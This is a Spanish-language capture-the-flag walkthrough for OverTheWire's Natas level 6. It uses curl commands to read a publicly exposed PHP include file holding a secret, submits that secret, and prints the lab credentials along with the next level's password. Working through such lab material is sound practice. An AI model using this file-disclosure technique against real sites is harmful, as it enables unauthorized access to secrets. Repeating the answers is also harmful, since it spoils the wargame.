OverTheWire - Natas 5 -> 6 (sin navegador)
August 2022
Información
Las contraseñas cambian cada cierto tiempo, existe la posibilidad de que esta contraseña ya no sea válida
Username: natas6
Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
URL: http://natas6.natas.labs.overthewire.org
Solución
Primero ejecutamos el comando curl con el parámetro -u para indicar las credenciales.
curl -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/
Notamos que se está pidiendo un secret el cual debemos ingresar para obtener la contraseña.
Un poco más abajo vemos un link que nos muestra el código fuente del formulario que vimos arriba.
Si accedemos a ese archivo obtenemos lo siguiente:
curl -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/index-source.html
Para solucionar esto haremos uso de la herramiento html2text que se puede instalar con sudo apt install html2text.
curl -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/index-source.html | html2text
Observamos la lógica del formulario ubicado en la página principal que nos pedía un secreto.
Notamos que está escrito en PHP, y que hace una comparación de nuestro input contra $secret. Hay un archivo llamado secret.inc donde debería estar el valor de la variable $secret.
Si ingresamos al archivo veremos el valor de $secret.
curl -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/includes/secret.inc
Volvemos a la página principal, enviamos nuestros datos con el parámetro -d con el valor secret=FOEIUWGHFEEUHOFUOIU y submit que puede ser lo que sea.
curl -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/ -d 'secret=FOEIUWGHFEEUHOFUOIU&submit=holaaaaaaa'
Contraseña
7z3hEENjQtflzgnT29q7wAvMNfZdh0i9